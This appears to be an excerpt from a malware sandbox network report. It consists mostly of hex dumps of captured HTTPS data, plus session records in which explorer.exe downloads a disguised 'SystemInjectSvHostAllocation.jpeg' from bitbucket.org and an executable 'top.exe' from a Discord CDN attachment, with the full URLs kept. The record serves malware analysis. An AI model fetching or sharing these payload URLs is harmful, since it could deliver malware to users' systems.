                                                                                                                                                        2021-12-28 02:24:04 UTC2222INData Raw: b9 78 42 ff a1 49 01 ff a4 4f 0b ff a3 4f 0b ff a2 4e 0b ff bb 59 0a ff c5 59 03 ff c4 59 03 ff c4 5a 04 ff c5 5a 04 ff c5 5a 04 ff c5 5a 05 ff c6 5b 05 ff c6 5b 05 ff c6 5b 06 ff c7 5c 06 ff c7 5d 07 ff c7 5d 07 ff c8 5d 08 ff c9 5e 08 ff c9 5e 09 ff c9 5f 0a ff ca 5f 0a ff ca 60 0a ff ca 60 0b ff cb 61 0b ff cb 61 0c ff cc 62 0d ff cc 62 0d ff cd 63 0d ff cd 63 0e ff ce 64 0f ff ce 64 0f ff ce 65 10 ff cf 65 10 ff d0 66 11 ff d0 66 11 ff d1 67 12 ff d1 67 12 ff d1 68 13 ff d2 68 14 ff d2 69 14 ff d3 6a 15 ff d4 6a 15 ff d4 6b 16 ff d5 6b 16 ff d5 6c 17 ff d6 6c 17 ff d6 6d 18 ff d7 6d 18 ff d7 6e 19 ff d8 6e 1a ff d8 6f 1a ff d9 6f 1b ff d9 70 1b ff d9 70 1c ff da 71 1c ff da 71 1d ff db 72 1e ff db 72 1e ff dc 73 1f ff dc 74 1f ff dd 74 1f ff dd 74 20
                                                                                                                                                        Data Ascii: xBIOONYYYZZZZ[[[\]]]^^__``aabbccddeeffgghhijjkkllmmnnooppqqrrsttt
                                                                                                                                                        2021-12-28 02:24:04 UTC2238INData Raw: c0 6f 2d ff b6 57 0a ff b6 5b 10 ff b6 5a 0f ff b6 5b 11 ff c3 5c 09 ff c6 5b 04 ff c6 5c 06 ff c7 5c 06 ff c7 5c 07 ff c7 5d 08 ff c8 5d 08 ff c8 5e 08 ff c9 5e 09 ff c9 5f 09 ff ca 5f 0a ff ca 60 0b ff cb 61 0b ff cb 61 0b ff cb 62 0c ff cc 62 0c ff cc 62 0d ff cd 63 0e ff ce 64 0e ff ce 64 0f ff cf 65 0f ff cf 65 10 ff d0 66 11 ff d0 66 11 ff d1 67 12 ff d1 67 12 ff d2 68 13 ff d2 69 14 ff d3 69 14 ff d4 6a 15 ff d4 6a 16 ff d5 6b 17 ff d5 6c 17 ff d6 6d 18 ff d6 6d 18 ff d7 6e 19 ff d7 6e 1a ff d8 6f 1a ff d8 6f 1b ff d9 70 1c ff da 71 1c ff da 72 1d ff db 72 1e ff dc 73 1f ff dc 73 1f ff dd 74 20 ff dd 74 20 ff de 75 21 ff de 76 21 ff df 76 22 ff e0 77 23 ff e0 78 24 ff e1 78 24 ff e1 79 25 ff e2 79 25 ff e2 7a 26 ff e3 7b 27 ff e4 7b 28 ff e4 7c 28
                                                                                                                                                        Data Ascii: o-W[Z[\[\\\]]^^__`aabbbcddeeffgghiijjklmmnnoopqrrsst t u!v!v"w#x$x$y%y%z&{'{(|(
                                                                                                                                                        2021-12-28 02:24:04 UTC2239INData Raw: c1 6e 2b ff b7 58 0b ff b8 5c 10 ff b6 5a 10 ff b8 5c 11 ff c4 5c 09 ff c6 5b 05 ff c6 5b 06 ff c7 5c 06 ff c7 5d 07 ff c8 5d 08 ff c8 5d 08 ff c8 5e 08 ff c9 5e 09 ff c9 5f 09 ff ca 5f 0a ff ca 60 0a ff cb 61 0b ff cb 61 0c ff cc 62 0c ff cd 62 0d ff cd 63 0e ff cd 63 0e ff ce 64 0e ff ce 64 0f ff cf 65 10 ff d0 65 10 ff d0 66 11 ff d0 67 12 ff d1 67 12 ff d2 68 13 ff d2 68 13 ff d3 69 14 ff d3 69 15 ff d4 6a 15 ff d4 6b 16 ff d5 6b 17 ff d5 6c 18 ff d6 6d 18 ff d7 6d 19 ff d7 6e 1a ff d8 6e 1a ff d9 6f 1b ff d9 70 1b ff da 70 1c ff da 71 1d ff db 72 1d ff db 73 1e ff dc 73 1f ff dd 74 1f ff dd 74 20 ff de 75 21 ff de 75 21 ff df 76 22 ff df 77 23 ff e0 78 24 ff e1 78 24 ff e1 78 25 ff e2 79 26 ff e2 7a 26 ff e3 7a 27 ff e3 7b 27 ff e4 7c 28 ff e4 7c 28
                                                                                                                                                        Data Ascii: n+X\Z\\[[\]]]^^__`aabbccddeefgghhiijkklmmnnoppqrsstt u!u!v"w#x$x$x%y&z&z'{'|(|(
                                                                                                                                                        2021-12-28 02:24:04 UTC2255INData Raw: c7 65 15 ff c6 64 15 ff c5 63 14 ff c4 63 14 ff c4 63 15 ff c7 5e 0a ff c7 5c 06 ff c8 5d 08 ff c8 5e 08 ff c9 5e 09 ff c9 5f 09 ff ca 60 0a ff ca 60 0a ff ca 60 0b ff cb 61 0c ff cc 62 0c ff cc 62 0d ff cd 63 0d ff ce 63 0e ff ce 64 0f ff ce 64 0f ff cf 65 10 ff d0 66 10 ff d0 66 11 ff d0 67 12 ff d1 67 12 ff d2 68 13 ff d2 69 14 ff d3 69 15 ff d3 6a 15 ff d4 6b 16 ff d5 6b 17 ff d5 6c 17 ff d6 6d 18 ff d7 6d 18 ff d7 6e 1a ff d8 6f 1a ff d9 6f 1b ff d9 70 1c ff da 71 1c ff da 71 1d ff db 72 1e ff dc 73 1e ff dc 74 1f ff dd 74 20 ff de 75 20 ff de 76 21 ff df 76 22 ff df 77 23 ff e0 78 24 ff e1 78 24 ff e1 79 25 ff e2 7a 26 ff e3 7a 26 ff e3 7b 27 ff e4 7c 28 ff e5 7c 29 ff e5 7d 2a ff e6 7e 2a ff e7 7f 2b ff e7 7f 2c ff e8 80 2c ff e9 80 2d ff e9 81 2e
                                                                                                                                                        Data Ascii: edccc^\]^^_```abbccddeffgghiijkklmmnoopqqrstt u v!v"w#x$x$y%z&z&{'|(|)}*~*+,,-.
                                                                                                                                                        2021-12-28 02:24:04 UTC2256INData Raw: c7 65 15 ff c7 64 15 ff c5 64 14 ff c5 63 14 ff c4 63 14 ff c7 5e 0a ff c8 5c 06 ff c8 5d 08 ff c8 5e 08 ff c9 5e 09 ff c9 5f 09 ff ca 5f 0a ff ca 60 0a ff cb 61 0b ff cb 61 0c ff cc 62 0c ff cc 62 0d ff cd 63 0e ff cd 63 0e ff ce 64 0f ff ce 65 0f ff cf 65 10 ff cf 66 10 ff d0 66 11 ff d1 67 12 ff d1 67 12 ff d2 68 13 ff d2 69 14 ff d3 69 15 ff d3 6a 15 ff d4 6b 16 ff d5 6b 17 ff d5 6c 17 ff d6 6d 18 ff d7 6e 19 ff d7 6e 19 ff d8 6f 1a ff d9 70 1b ff d9 70 1c ff da 71 1c ff da 72 1d ff db 72 1e ff dc 73 1f ff dc 74 1f ff dd 74 20 ff de 75 21 ff de 76 21 ff df 76 22 ff df 77 23 ff e0 78 24 ff e1 78 25 ff e2 79 25 ff e2 7a 26 ff e3 7b 26 ff e4 7b 27 ff e4 7c 28 ff e5 7d 29 ff e5 7d 2a ff e6 7e 2b ff e7 7f 2b ff e7 80 2b ff e8 80 2c ff e8 81 2d ff e9 81 2e
                                                                                                                                                        Data Ascii: eddcc^\]^^__`aabbccdeeffgghiijkklmnnoppqrrstt u!v!v"w#x$x%y%z&{&{'|(})}*~+++,-.
                                                                                                                                                        2021-12-28 02:24:04 UTC2272INData Raw: e0 e0 e0 ff df df df ff df df e0 ff df df df ff df df df ff e2 e2 e3 ff e6 e6 e6 ff e6 e5 e5 ff e6 e5 e6 ff e6 e6 e6 ff e6 e6 e6 ff e5 e5 e5 ff e5 e5 e5 ff e3 e3 e4 ff e2 e2 e2 ff e2 e2 e2 ff e0 e0 e0 ff de de de ff dc dc dc ff da db da ff d9 d9 d9 ff d8 d7 d8 ff d7 d6 d7 ff d6 d6 d6 ff d5 d5 d5 ff d5 d5 d5 ff d6 d6 d6 ff d7 d7 d7 ff d9 d9 d8 ff da da da ff db db db ff dc dc dc ff dd dd de ff df df df ff e0 e0 e0 ff e2 e2 e1 ff e3 e3 e3 ff e4 e4 e4 ff e5 e5 e5 ff e5 e6 e6 ff e6 e6 e6 ff e7 e8 e7 ff e8 e8 e8 ff e9 e8 e9 ff e9 e9 e9 ff ea ea ea ff eb eb eb ff ec ec ec ff ed ed ed ff ee ed ed ff ee ee ee ff ef ee ef ff ef ef ef ff f0 f0 f0 ff f0 f0 f0 ff f1 f0 f1 ff f1 f1 f1 ff f2 f1 f1 ff f2 f2 f2 ff f2 f2 f2 ff f2 f2 f2 ff f2 f2 f3 ff f3 f2 f3 ff f3 f3 f3
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2273INData Raw: e0 e0 e0 ff e0 e0 e0 ff df e0 e0 ff df df e0 ff df df df ff e3 e3 e3 ff e6 e6 e5 ff e5 e6 e6 ff e6 e6 e6 ff e6 e6 e6 ff e5 e5 e5 ff e5 e4 e5 ff e4 e4 e4 ff e2 e2 e2 ff e2 e2 e2 ff e0 e0 df ff dd de dd ff db db db ff d9 d9 d9 ff d6 d6 d6 ff d3 d4 d4 ff d2 d2 d2 ff d0 d0 d0 ff cf cf cf ff cf cf cf ff cf ce cf ff cf cf cf ff d0 d0 d0 ff d2 d2 d2 ff d3 d3 d3 ff d5 d5 d5 ff d6 d6 d6 ff d8 d8 d8 ff d9 d9 d9 ff da db db ff dc dd dd ff de dd de ff df df df ff e0 e1 e0 ff e2 e2 e2 ff e3 e3 e2 ff e4 e4 e4 ff e5 e5 e5 ff e6 e6 e6 ff e7 e7 e7 ff e8 e8 e8 ff e9 e9 e9 ff ea e9 ea ff eb eb eb ff ec eb eb ff ec ec ec ff ed ec ed ff ee ed ed ff ee ee ee ff ef ef ef ff ef ef ef ff f0 f0 f0 ff f0 f0 f1 ff f2 f1 f1 ff f2 f2 f2 ff f2 f2 f2 ff f3 f2 f3 ff f3 f3 f3 ff f3 f3 f3
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2289INData Raw: e4 e4 e4 ff e4 e4 e4 ff e4 e4 e4 ff e3 e4 e4 ff e3 e3 e3 ff e1 e2 e2 ff de de de ff d9 d9 d9 ff d4 d4 d4 ff cd cd cd ff c6 c6 c6 ff be be be ff b5 b5 b5 ff ab aa ab ff a1 a1 a1 ff 98 99 98 ff 91 91 91 ff 89 89 89 ff 76 76 76 ff 88 88 88 ff b0 b0 b1 ff a6 a6 a6 ff 9b 9b 9c ff 91 91 91 ff 86 86 87 ff 7d 7d 7d ff 76 76 76 ff 70 70 70 ff 71 71 71 ff 72 71 71 ff 72 72 72 ff 73 73 73 ff 75 75 75 ff 76 76 76 ff 77 77 77 ff 77 77 77 ff 77 77 77 ff 77 77 77 ff 78 78 78 ff 78 78 78 ff 78 78 78 ff 78 78 78 ff 78 78 78 ff 78 78 78 ff 78 78 78 ff 79 79 79 ff 79 79 79 ff 7a 7a 7a ff 7a 7a 7a ff 7b 7b 7b ff 7b 7b 7b ff 7b 7b 7b ff 7c 7c 7c ff 7d 7d 7d ff 7e 7e 7e ff 7f 7f 7f ff 7f 7f 7f ff 80 80 80 ff 81 81 81 ff 82 82 82 ff 83 83 83 ff 84 84 84 ff 85 85 85 ff 86 86 86
                                                                                                                                                        Data Ascii: vvv}}}vvvpppqqqrqqrrrsssuuuvvvwwwwwwwwwwwwxxxxxxxxxxxxxxxxxxxxxyyyyyyzzzzzz{{{{{{{{{|||}}}~~~
                                                                                                                                                        2021-12-28 02:24:04 UTC2290INData Raw: e4 e4 e4 ff e4 e4 e4 ff e4 e4 e4 ff e4 e4 e4 ff e3 e3 e4 ff e0 e0 e0 ff db db db ff d7 d7 d7 ff d1 d0 d1 ff c9 c9 c9 ff c1 c1 c1 ff b8 b8 b8 ff af af af ff a5 a4 a4 ff 9b 9b 9b ff 93 93 93 ff 8d 8c 8c ff 7a 7a 7a ff 7d 7d 7d ff c5 c5 c6 ff d8 d8 d9 ff d5 d5 d6 ff d4 d4 d5 ff d4 d3 d4 ff d1 d1 d2 ff c8 c8 c8 ff bb bb bc ff af b0 b0 ff a4 a4 a4 ff 98 98 98 ff 8c 8c 8c ff 83 83 83 ff 78 78 78 ff 73 73 72 ff 70 70 70 ff 71 71 71 ff 71 71 71 ff 72 72 72 ff 73 73 73 ff 74 74 74 ff 76 76 76 ff 78 78 78 ff 78 78 78 ff 78 78 78 ff 79 79 78 ff 79 79 79 ff 79 79 79 ff 79 79 79 ff 79 79 79 ff 79 79 79 ff 79 79 79 ff 79 79 79 ff 7a 7a 7a ff 7b 7b 7b ff 7b 7b 7b ff 7b 7b 7b ff 7c 7c 7c ff 7c 7c 7c ff 7d 7d 7d ff 7e 7e 7e ff 7f 7f 7f ff 80 80 80 ff 81 81 81 ff 82 82 82
                                                                                                                                                        Data Ascii: zzz}}}xxxssrpppqqqqqqrrrssstttvvvxxxxxxxxxyyxyyyyyyyyyyyyyyyyyyyyyzzz{{{{{{{{{||||||}}}~~~
                                                                                                                                                        2021-12-28 02:24:04 UTC2306INData Raw: cd cd cd ff 96 96 96 ff 7c 7c 7c ff 87 87 87 ff 96 96 96 ff 79 79 7a ff 80 80 80 ff 86 86 86 ff 90 90 90 ff a2 a2 a2 ff b1 b1 b2 ff bf bf c0 ff c6 c7 c8 ff cd cd ce ff d2 d2 d3 ff d5 d4 d6 ff d5 d4 d6 ff d4 d4 d5 ff d3 d3 d4 ff d3 d3 d4 ff d2 d2 d3 ff d1 d1 d2 ff d1 d2 d2 ff d2 d2 d3 ff d2 d2 d3 ff d2 d2 d3 ff d2 d2 d3 ff d3 d2 d4 ff d3 d3 d4 ff d3 d3 d4 ff d4 d4 d4 ff d4 d4 d5 ff d4 d4 d5 ff d4 d4 d5 ff d4 d4 d5 ff d5 d5 d6 ff d5 d5 d6 ff d6 d6 d6 ff d6 d6 d7 ff d6 d6 d7 ff d6 d6 d7 ff d7 d7 d7 ff d7 d7 d8 ff d7 d7 d8 ff d8 d8 d8 ff d8 d8 d9 ff d8 d8 d9 ff d9 d9 d9 ff d9 d9 da ff d9 d9 da ff da d9 da ff da da db ff da da db ff db db db ff db db dc ff db db dc ff db db dc ff dc dc dd ff dc dd dd ff dd dd de ff dd dd de ff dd de de ff de de de ff de de df
                                                                                                                                                        Data Ascii: |||yyz
                                                                                                                                                        2021-12-28 02:24:04 UTC2307INData Raw: 7b 7b 7a ff 8b 8b 8b ff ad ad ae ff bd bd be ff 8e 8e 8e ff 84 84 85 ff 9d 9d 9d ff 90 90 90 ff 86 86 86 ff 7d 7d 7d ff 7a 7a 7a ff 7a 7a 79 ff 7e 7e 7e ff 83 83 83 ff 8c 8c 8c ff 9a 9a 9a ff ab ab ab ff b9 b9 ba ff c4 c4 c5 ff ca cb cb ff d0 d1 d1 ff d5 d5 d7 ff d6 d6 d7 ff d6 d6 d7 ff d5 d5 d6 ff d4 d4 d5 ff d3 d3 d4 ff d3 d3 d4 ff d3 d3 d4 ff d3 d3 d4 ff d4 d3 d4 ff d4 d4 d5 ff d4 d4 d5 ff d4 d4 d5 ff d5 d4 d5 ff d5 d5 d6 ff d5 d5 d6 ff d6 d6 d6 ff d6 d6 d7 ff d6 d6 d7 ff d6 d6 d7 ff d7 d7 d7 ff d7 d7 d8 ff d7 d7 d8 ff d8 d8 d8 ff d8 d8 d9 ff d8 d8 d9 ff d9 d9 da ff d9 d9 da ff da d9 da ff d9 da da ff da da db ff db da db ff db db db ff db db dc ff db db dc ff db dc dc ff dc dc dc ff dc dc dd ff dd dd de ff dd dd de ff dd de de ff de de de ff de de df
                                                                                                                                                        Data Ascii: {{z}}}zzzzzy~~~
                                                                                                                                                        2021-12-28 02:24:04 UTC2323INData Raw: f4 f4 f4 ff ed ed ed ff ed ed ed ff ef ef ef ff f0 f0 f0 ff f2 f2 f2 ff f3 f3 f3 ff f3 f3 f3 ff f3 f3 f3 ff ed ed ed ff e3 e3 e3 ff da da da ff cb cb cb ff b9 b9 b9 ff 9f 9f 9f ff 8f 8f 8f ff 84 84 84 ff 7f 7f 7f ff 79 79 79 ff 7b 7b 7b ff 7f 7f 7f ff 89 89 89 ff 94 94 94 ff 9c 9c 9d ff a0 a0 a1 ff a5 a5 a6 ff a8 a8 a9 ff a8 a8 a9 ff a7 a7 a8 ff a6 a6 a7 ff a5 a5 a6 ff a4 a4 a5 ff a2 a2 a3 ff a1 a1 a2 ff a0 a1 a2 ff 9f 9f a1 ff 9f 9e a0 ff 9e 9d 9f ff 9d 9d 9e ff 9c 9c 9d ff 9b 9b 9d ff 9a 9a 9c ff 99 99 9b ff 98 98 9a ff 98 97 99 ff 97 97 98 ff 96 96 98 ff 95 95 97 ff 94 94 96 ff 93 93 95 ff 92 92 94 ff 91 91 93 ff 90 90 92 ff 8f 8f 92 ff 8e 8e 91 ff 8d 8e 90 ff 8c 8d 8f ff 8c 8b 8e ff 8b 8a 8d ff 89 89 8c ff 88 89 8c ff 88 88 8a ff 87 87 89 ff 86 86 89
                                                                                                                                                        Data Ascii: yyy{{{
                                                                                                                                                        2021-12-28 02:24:04 UTC2324INData Raw: ef ef ef ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ee ee ee ff ef ef ef ff f1 f1 f1 ff f2 f2 f2 ff f3 f3 f3 ff f2 f2 f2 ff ee ee ee ff e5 e5 e5 ff dd dd dd ff d1 d1 d1 ff bb bb bb ff a4 a4 a4 ff 91 91 91 ff 88 88 88 ff 81 81 81 ff 7b 7b 7b ff 78 78 78 ff 7c 7c 7c ff 84 84 84 ff 8e 8f 8f ff 96 97 97 ff 9b 9b 9c ff 9f 9f a0 ff a3 a3 a4 ff a3 a3 a4 ff a2 a2 a4 ff a1 a1 a3 ff a0 a0 a1 ff 9f 9f a0 ff 9d 9d 9e ff 9c 9c 9d ff 9b 9b 9d ff 9a 9a 9c ff 99 99 9b ff 98 98 9a ff 98 97 99 ff 97 97 99 ff 96 96 98 ff 95 95 97 ff 94 94 96 ff 93 93 95 ff 92 92 94 ff 91 91 93 ff 90 90 92 ff 8f 8f 92 ff 8e 8e 91 ff 8d 8e 90 ff 8c 8c 8f ff 8b 8b 8e ff 8a 8a 8d ff 89 89 8c ff 88 89 8c ff 87 88 8a ff 87 87 89 ff 86 86 88
                                                                                                                                                        Data Ascii: {{{xxx|||
                                                                                                                                                        2021-12-28 02:24:04 UTC2340INData Raw: ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2341INData Raw: ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2357INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 76 76 76 09 76 76 76 15 74 74 74 25 74 74 74 39 72 72 72 53 72 72 72 63 70 70 70 81 70 70 70 8b 6f 6f 6f b1 6e 6e 6e bb 73 73 73 e3 76 76 76 f1 7d 7d 7d ff 84 84 84 ff 8b 8b 8b ff 99 99 99 ff 9c 9c 9c ff ac ac ac ff b0 b0 b0 ff c1 c1 c1 ff c5 c5 c5 ff d6 d6 d6 ff de de de ff e9 e9 e9 ff ef ef ef ff f0 f0 f0 ff f1 f1 f1 ff f2 f2 f2 ff f4 f4 f4 ff f3 f3 f3 ff f1 f1 f1 ff f1 f1 f1 ff ee ee ee ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed
                                                                                                                                                        Data Ascii: vvvvvvttt%ttt9rrrSrrrcppppppooonnnsssvvv}}}
                                                                                                                                                        2021-12-28 02:24:04 UTC2358INData Raw: ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 ff ff ff 01 75 75 75 15 75 75 75 1d 74 74 74 35 73 73 73 47 72 72 72 61 71 71 71 75 70 70 70 89 6f 6f 6f a1 6f 6f 6f b5 6f 6f 6f d5 70 70 70 e1 7a 7a 7a ff 7e 7e 7e ff 89 89 89 ff 90 90 90 ff 9b 9b 9b ff a6 a6 a6 ff af af af ff bd bd bd ff c2 c2 c2 ff d4 d4 d4 ff d8 d8 d8 ff eb eb eb ff ee ee ee ff ef ef ef ff f0 f0 f0 ff f2 f2 f2 ff f3 f3 f3 ff f3 f3 f3 ff f3 f3 f3 ff f1 f1 f1 ff ef ef ef ff ee ee ee ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed ff ed ed ed
                                                                                                                                                        Data Ascii: uuuuuuttt5sssGrrraqqqupppooooooooopppzzz~~~
                                                                                                                                                        2021-12-28 02:24:04 UTC2374INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:24:04 UTC2375INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        6192.168.2.349865104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:24:06 UTC2381OUTGET /trustedrootdev/file/downloads/SystemInjectSvHostAllocation.jpeg HTTP/1.1
                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2021-12-28 02:24:06 UTC2657INHTTP/1.1 302 Found
                                                                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                                                                                        Server: nginx
                                                                                                                                                        X-Usage-Quota-Remaining: 999307.859
                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                        X-Usage-Request-Cost: 703.57
                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        X-B3-TraceId: 295c3b78a1cb2640
                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                        X-Dc-Location: Micros
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:24:06 GMT
                                                                                                                                                        X-Usage-User-Time: 0.016815
                                                                                                                                                        X-Usage-System-Time: 0.004292
                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/a0c2d096-5a32-4fc5-bc89-144f91b75eea/downloads/c11a3bbe-0715-4925-98a9-878a89cb5d30/SystemInjectSvHostAllocation.jpeg?Signature=LDOR36W%2BwQF5Tkg1ureXCHpXgbM%3D&Expires=1640659960&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=.Wcxa0jbVct74JSOIvCvnlvmd2tptWg5&response-content-disposition=attachment%3B%20filename%3D%22SystemInjectSvHostAllocation.jpeg%22
                                                                                                                                                        X-Served-By: cbf625c0b7d3
                                                                                                                                                        Expires: Tue, 28 Dec 2021 02:24:06 GMT
                                                                                                                                                        Content-Language: en
                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                        X-Static-Version: dfb18959be9c
                                                                                                                                                        X-Render-Time: 0.0389068126678
                                                                                                                                                        Connection: close
                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                        X-Request-Count: 1607
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Version: dfb18959be9c
                                                                                                                                                        X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                        Content-Length: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        7192.168.2.349868162.159.135.233443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:24:06 UTC2381OUTGET /attachments/925145879403446292/925145901322879006/top.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                        2021-12-28 02:24:06 UTC2381INHTTP/1.1 200 OK
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:24:06 GMT
                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                        Content-Length: 3624448
                                                                                                                                                        Connection: close
                                                                                                                                                        CF-Ray: 6c4754985e35702e-FRA
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Age: 15519
                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                        Content-Disposition: attachment;%20filename=top.exe
